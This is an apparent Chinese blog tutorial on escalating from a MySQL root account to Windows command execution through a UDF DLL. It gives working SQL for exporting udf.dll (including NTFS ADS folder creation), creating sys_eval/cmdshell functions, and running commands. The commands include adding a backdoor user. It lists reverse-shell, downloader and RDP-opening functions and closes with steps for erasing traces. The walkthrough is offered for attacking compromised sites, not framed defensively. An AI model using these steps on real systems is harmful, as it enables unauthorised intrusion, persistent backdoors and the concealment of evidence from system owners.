Mysql_UDF提权

Root权限

一、上传udf.dll

小于mysql5.1版本
C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll
等于mysql5.1版本
%mysql%\plugin\udf.dll 用 select @@plugin_dir 查询plugin路径
默认 C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin\udf.dll

1、UDF提权专用webshell,导出dll、再执行命令。
2、Phpspy.php的Mysql上传(提示 “上传失败、原因:Result consisted of more than one row”、实际上大多数已上传成功),再连接mysql执行命令。
3、Mysql允许外连的情况下也可以使用Hack MySQL上传,再通过命令行登陆执行命令。

二、执行SQL

Create function MyCmd returns string soname "udf.dll";
Select MyCmd("CMD命令");
Drop function MyCmd;

UDF(用户定义函数)是一类对MYSQL服务器功能进行扩充的代码,通常是用C(或C++)写的。通过添加新函数,性质就象使用本地MYSQL函数abs()或concat()。当你需要扩展MYSQL服务器功能时,UDF通常是最好的选择。但同时,UDF也是黑客们在拥有低权限mysql账号时比较好用的一种提权方法。

适用场合:

1、目标主机系统是Windows(Win2000、XP、Win2003)。

2、拥有该主机mysql中的某个用户账号,该账号需要有对mysql的insert和delete权限。

使用方法:

1、获取当前mysql的一个账号,一般情况下在网站的config.php文件就能找到(具体在哪个文件每个CMS都不一样)。

2、把udf专用的webshell传到服务器上,访问并进行数据库连接。

3、连接成功后,导出DLL文件。mysql<5.0,导出路径随意;5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32),否则在下一步操作中你会看到“No paths allowed for shared library”错误;mysql>5.1,需要使用

show variables like ‘%plugin%’;

语句查看插件安装路径,导出的时候指定DLL路径为插件路径。

4、使用SQL语句创建自定义函数。语法如下:

Create Function 函数名 returns string soname ‘导出的DLL路径’;
// e.g. Create Function cmdshell returns string soname ‘udf.dll’;

常用函数名:

cmdshell    执行cmd;
downloader  下载者,到网上下载指定文件并保存到指定目录;
open3389    通用开3389终端服务,可指定端口(不改端口无需重启);
backshell   反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread     读注册表;
regwrite    写注册表;
shut        关机,注销,重启;
about       说明与帮助函数;

若mysql>=5.0,语句中的DLL不允许带全路径,如果在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则将会看到”Can’t open shared library“错误。

如果提示“Function ‘cmdshell’ already exists”,则输入下列语句可以解决:

delete from mysql.func where name='cmdshell'

5、创建函数成功后,就可以通过sql语句去调用它了。语法如下:

select 创建的函数名 (‘参数列表’);
// e.g. select cmdshell(“net user ghy459 hack0nair /add”); 创建一个用户ghy459,密码为hack0nair

6、函数使用完后,我们需要把之前生成的DLL和创建的函数删除掉,但要注意次序,必须先删除函数再删除DLL。删除函数的语法如下:

drop function 创建的函数名;
// e.g. drop function cmdshell;

1、导出的文件名不一定非是xxx.dll,可以是任意的。

create function sys_eval returns string soname 'udf.xox';

2、提示错误 Can’t open shared library ‘fun.dll’ (errno: 2 )

除了udf不存在、udf被杀,还有可能是你的udf版本不对,你拿32位的udf去在64位系统注册的话,一样会提示错误。

3、降权的mysql一样有用,能注册dll的话你一样能够执行命令,不过权限是根据mysql来的, 在不支持aspx,ws、shell.application被删得情况下还有一丝希望。


00x1

首先判断mysql版本,

mysql版本 < 5.2 , UDF导出到系统目录c:/windows/system32/

mysql版本 > 5.2 ,UDF导出到安装路径MySQL\Lib\Plugin\

一般Lib、Plugin文件夹需要手工建立(可用流模式突破进而创建文件夹)

可能会用到的命令:

select @@datadir 路径

select @@version 版本

使用NTFS ADS流创建lib、plugin文件夹:

某些情况下,我们会遇到Can't open shared library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,但是默认情况下plugin不存在,怎么办? 还好有大牛研究出了利用NTFS ADS流来创建文件夹的方法
select @@basedir;   //查找mysql的目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';    //使用NTFS ADS流创建lib目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS再次创建plugin目录
执行成功以后再进行导出即可。 

直接执行

create function sys_eval returns string soname 'udf.dll'

若成功则可直接执行命令。

mysql版本小于5.1此方法一般不成功,则需要导入dll到系统目录,一般导入到c:\windows\system32\,如果不可写入则试试c:\windows\(一般5.0一下放这)。

00x4

具体语句如下:

create table a (cmd LONGBLOB);

insert into a (cmd) values (hex(load_file('D:\\Program Files\\MySQL\\MySQL Server 5.0\\Lib\\Plugin\\lib_mysqludf_sys.dll'))); 

SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';

create function sys_eval returns string soname 'udf.dll'

select sys_eval('ipconfig');

擦除痕迹:

drop table a;
drop function sys_eval;

Ps:一定要是root

  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值